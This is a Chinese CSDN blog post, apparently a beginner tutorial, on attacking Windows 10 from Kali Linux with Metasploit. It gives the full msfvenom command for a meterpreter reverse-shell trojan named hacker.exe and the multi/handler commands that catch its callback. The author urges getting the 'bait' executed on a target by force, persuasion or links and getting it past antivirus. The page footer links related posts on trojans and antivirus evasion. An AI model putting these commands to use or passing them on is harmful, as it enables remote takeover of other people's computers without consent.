kali metasploit 攻击 windows

最新推荐文章于 2024-06-15 16:06:58 发布
最新推荐文章于 2024-06-15 16:06:58 发布
阅读量907 收藏 8
点赞数 3
文章标签: 经验分享 安全 linux metasploit windows
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42102555/article/details/107608308
版权

这是一个简单的metasploit使用实例:
首先,我们要先准备一些东西:
1.kali 虚拟机
2.kali IP地址:192.168.222.128 (可使用ifconfig查询)
3.一个kali没有使用的端口:5555
4.一个可以与kali通信的靶机:windows 10 (ip未知)

首先,我们得准备一下我们的鱼饵:hacker.exe
我们先在kali里精心制作一下鱼饵!:

#:msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.222.128 LPORT=5555 -f exe -o /hacker.exe

这个是什么意思呢?就是执行命令,就会在根目录生成一个hacker.exe 这个exe可以向IP为192.168.222.128的主机端口5555发送一些东西,就相当于是一个间谍,间谍只需要把必要的东西(handler)句柄发过去,就 成功了。

在这里插入图片描述
这个文件是鱼饵了!!!

但是有了鱼饵还不够,对吧,我们要找个东西给他接住,间谍拿到东西,我们得找人给他接头!于是,我们就去kali上服务台给他配个接头人!
在这里插入图片描述特务怎么做呢!

msfconsole #进入msf
use exploit/multi/handler #使用该模块
set payload windows/meterpreter/reverse_tcp #使用该payload
set LHOST 192.168.222.128 #设置接头人IP
set LPORT 5555 #设置接头人端口
exploit #接头人开始工作

在这里插入图片描述
看到这,你的接头老特务就开始工作了!

他就一直在老地方接头!!!

然后,你通过你自己的方式,对吧,强迫也好,软磨硬泡也好,把鱼饵给目标计算机,让他执行!!!这里有个前提,目标计算机必须和kali能够通信好吧!你TM都不能通信,物理上都不能连接,就别白扯了好吧!这里演示的是内网通信,公网通信稍稍复杂,咱就不说了!同志们可以去百度查找资料,学习!

然后呢,间谍执行!!===windows 执行hacker.exe
windows 咋有hacker.exe
呵!年轻!当然是拷过去的!不然你以为呢!可以弄一下什么链接呀,对吧,随便你了,反正!!!主要是要执行

执行结果!!
在这里插入图片描述玩个!!!球!!拿错了!强制执行!!!信任好吧!!
不要杀!!
哈哈哈
强行中毒好吧,强行中毒!
在这里插入图片描述

执行后:
在这里插入图片描述kali 反弹了一个shell
可以执行ls,help,等命令查看目标
然后,mkdir dager 测试一下,做个文件夹
在这里插入图片描述
成功!!!

在这里插入图片描述

今天就到这!!!再见!!!
在这里插入图片描述
白嫖兄们,爱你呦!!!

dager_d&g
关注
  • 3
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
kali入侵win7.txt
07-23
整合了网络众多教程,容易出错处写的较详细,便于新手测试学习。
kali系统入侵电脑windows(win11系统)渗透测试,骇入电脑教学
这个博主不懒,但Ta什么也没写~(私信互关24小时必回)
01-27 5770
本次渗透测试将使用kali虚拟机(攻击机)对本机(靶机)进行入侵并监控屏幕。
如何使用kali来入侵(渗透)一台windows_kali利用win11漏洞
最新发布
ewii12567的博客
06-15 804
工具:一台带有kali linux系统的虚拟机,一个聪明的大脑开始前我们先需要将kali虚拟机改为桥接网络模式,否则会导致渗透失败1.打开虚拟机,点击虚拟机2.点击设置3.点击网络适配器,看左边点击桥接模式,点击确定即可好了,现在我们就要正式渗透一个windows系统啦,兴不兴奋?1.打开虚拟机2.打开终端,输入sudo su进入root用户权限3.进入root权限后输入ifconfig查看本机ip地址,eth0旁边192开头的为本机ip。
Kali木马程序入侵windows
qq_58460014的博客
03-26 381
该软件执行时自动连接到我们的Kali,连接的端口为8888(端口可以任意),生成的文件为muma.exe,show options查看还需要设置什么参数,这里看到LHOST,和LPORT没有设置,LPORT和我们之前做好的木马程序返回的端口不一致所以要修改成我们的8888。这里我们的木马就已经生成好了,由于该木马没有做免杀操作,所以实验开始之前需要关闭自己的杀毒软件。本实验的目的是入侵被攻击者电脑获取shell,操作被攻击电脑。也是修改过来了,现在我们可以开始攻击了。使用msfconse工具。
如何使用kali来入侵(渗透)一台windows
热门推荐
qq_46406833的博客
05-17 2万+
此文章为网络安全爱好者小白设计的,所以木马没做免杀,渗透前请把防火墙和杀毒软件关闭
Kali利用msf渗透Windows电脑(超详细)
jennycisp的博客
02-27 2692
msfvenom a Metasploit standalone payload generator,Also a replacement for msfpayload and msfencode.是用来生成后门的软件。MSFvenom是Msfpayload和Msfencode的组合,将这两个工具都放在一个Framework实例中。自2015年6月8日起,msfvenom替换了msfpayload和msfencode。
metasploitWindows的多种提权方法
02-25
攻击机:kalilinux2.目标机:Win7在已经获取到一个meterpretershell后,假如session为1,且权限不是系统权限的前提下,使用以下列出的几种提权方法:本方法主要有以下3个模块。上面这些模块的详细信息在metasploit里...
metasploit模拟攻击
03-17
### Metasploit模拟攻击知识点详解 #### 一、Metasploit简介与应用场景 **Metasploit**是一款开源的安全漏洞检测工具,它可以帮助安全专家验证漏洞的存在,并管理这些漏洞的利用方式。Metasploit广泛应用于渗透...
Metasploit简单利用及入侵Windows7案例.docx
11-13
### Metasploit简单利用及入侵Windows7案例 #### 一、MS17_010漏洞利用实验 ##### 1. 发起漏洞探测 - **背景介绍**:本实验选择了MS17_010(永恒之蓝)漏洞进行攻击尝试。此漏洞允许攻击者在未打补丁的Windows...
Kali msf教程
08-24
- 安装MSF:在Kali Linux中已经预装了最新版本的Metasploit框架。 - **基本操作**: - 启动MSF控制台:通过命令`msfconsole`进入MSF控制台。 - 设置并执行攻击模块:使用`use`命令选择模块,通过`set`命令设置...
【二进制安全】堆漏洞:Double Free原理
cc123489ll的博客
04-24 303
我们先不用管 修改已被释放的空闲块中的内容到底有什么用,我们现在只需要知道。
Msf攻击Win7
07-09
Msf攻击Win7 metasploit
kali机利用永恒之蓝攻击win7靶机
qq_52731059的博客
11-23 843
使用0模块,用set rhost 命令设置好目标地址,show options命令查看配置信息,配置完成后使用run命令开始攻击。1、获取win7的IP地址,打开命令窗口,输入ipconfig获取IP地址。其中有0、1、2、3、4五个选项,分别代表不同的功能。可以看见存在445端口开放,这就是本次用来攻击的端口。通过扫描发现存在可利用的漏洞,继续使用0模块进行攻击。3、使用kali进入msfconsole工具。5、用3模块查找是否存在可利用的漏洞。4、查找ms7-010漏洞工具。6、使用0模块进行攻击
Kali | MSF入侵Windows11
BeacherHou的博客
07-13 6154
Kali | MSF入侵Windows11 制作免杀木马 ### 木马如何免杀 木马绕过免杀本质上还是更改他的特征码,那么总结一下可以有 编码 加壳免杀 二次编译 分离免杀:即将ShellCode和加载器分离 目前msfvenom的encoder特征基本都进入了杀软的漏洞库,很难实现单一encoder编码而绕过杀软,所以对shellcode进行进一步修改编译成了msf免杀的主流。互联网上有很多借助于C、C#、python等语言对shellcode进行二次编码从而达到免杀的效果。 木马如何制作 安装编译
kali下利用smb漏洞实现DDOS(SMBLoris攻击消耗windows RAM)
我的学习笔记
02-28 1590
参考:https://v.qq.com/x/page/d0532b3e7p6.html?start=36http://www.freebuf.com/news/142697.html目标开放445端口,windows系统攻击kali最新版(2017年8月3日 21:42:20)cat rst.sh#!/bin/bash iptables -F ipt...
Kali Linux利用MSF渗透Windows11电脑
Xiao5ovo的博客
03-02 5599
Msfvenom a Metasploit standalone payload generator,Also a replacement for msfpayload and msfencode.是用来生成后门的软件。MSFvenom是Msfpayload和Msfencode的组合,将这两个工具都放在一个Framework实例中。
kali入侵windows
weixin_34405557的博客
12-15 5009
因为我是一个爱好和平的人(捂嘴笑),所以就在虚拟机中,创建二个系统,一个kali,一个windows xp,来进行这次入侵实验,以此迈入hacke的大门。 ####实验环境 ![实验环境.jpg](http://upload-images.jianshu.io/upload_images/4976516-daae4fea5636c8d4.jpg?imageMogr2/auto-orient/...
网络渗透系列(三)Kali渗透工具- metasploit利用永恒之蓝漏洞攻击Windows系统全流程(全程干货、火爆连载更新中...)
Midheart1的博客
12-29 827
永恒之蓝漏洞Windows10及之前的系统都存在永恒之蓝漏洞,有很多业界大佬纷纷提出过这个事情,所以永恒之蓝这个经典案例依然值得学习和深入开发。
Kali渗透测试:使用Metasploit对Web应用的攻击
Liu_Bruce的博客
05-15 3570
Kali渗透测试:使用Metasploit对Web应用的攻击 Web应用程序的漏洞数量众多,这里我们以其中一个命令注入漏洞为例复现一下。这种漏洞源于Web应用程序没有对用户输入的内容进行准确的验证,从而导致操作系统执行了攻击者输入的命令。下面是一段运行在Metasploitable2靶机上的PHP脚本,它来自于DVWA,代码如下: <html> <body> <form name="ping" action="#" method="post"> &
用msf模拟攻击自己的window,msf基础
m0_62584974的博客
07-31 1084
使用msf制作病毒控制自己的window,学习msf基础的用法和msf的一些基础功能
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值